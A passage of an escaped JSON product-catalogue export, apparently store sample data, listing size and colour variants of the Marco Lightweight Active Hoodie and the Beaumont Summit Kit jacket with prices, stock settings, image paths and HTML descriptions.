"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"202\":{\"sku\":\"MH13-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-L-Green\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"203\":{\"sku\":\"MH13-L-Lavender\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-L-Lavender\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-l-lavender\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Lavender\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Lavender\"},\"204\":{\"sku\":\"MH13-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XL-Blue\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"205\":{\"sku\":\"MH13-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XL-Green\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"206\":{\"sku\":\"MH13-XL-Lavender\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XL-Lavender\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xl-lavender\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Lavender\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-lavender_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Lavender\"},\"207\":{\"sku\":\"MH13\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Cocona&reg; performance Fabric|Fleece,pattern=Solid,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH13-XS-Blue,size=XS,color=Blue|sku=MH13-XS-Green,size=XS,color=Green|sku=MH13-XS-Lavender,size=XS,color=Lavender|sku=MH13-S-Blue,size=S,color=Blue|sku=MH13-S-Green,size=S,color=Green|sku=MH13-S-Lavender,size=S,color=Lavender|sku=MH13-M-Blue,size=M,color=Blue|sku=MH13-M-Green,size=M,color=Green|sku=MH13-M-Lavender,size=M,color=Lavender|sku=MH13-L-Blue,size=L,color=Blue|sku=MH13-L-Green,size=L,color=Green|sku=MH13-L-Lavender,size=L,color=Lavender|sku=MH13-XL-Blue,size=XL,color=Blue|sku=MH13-XL-Green,size=XL,color=Green|sku=MH13-XL-Lavender,size=XL,color=Lavender\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Cocona&reg; performance Fabric|Fleece\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"208\":{\"sku\":\"MJ01-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XS-Orange\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"209\":{\"sku\":\"MJ01-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XS-Red\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"210\":{\"sku\":\"MJ01-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XS-Yellow\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 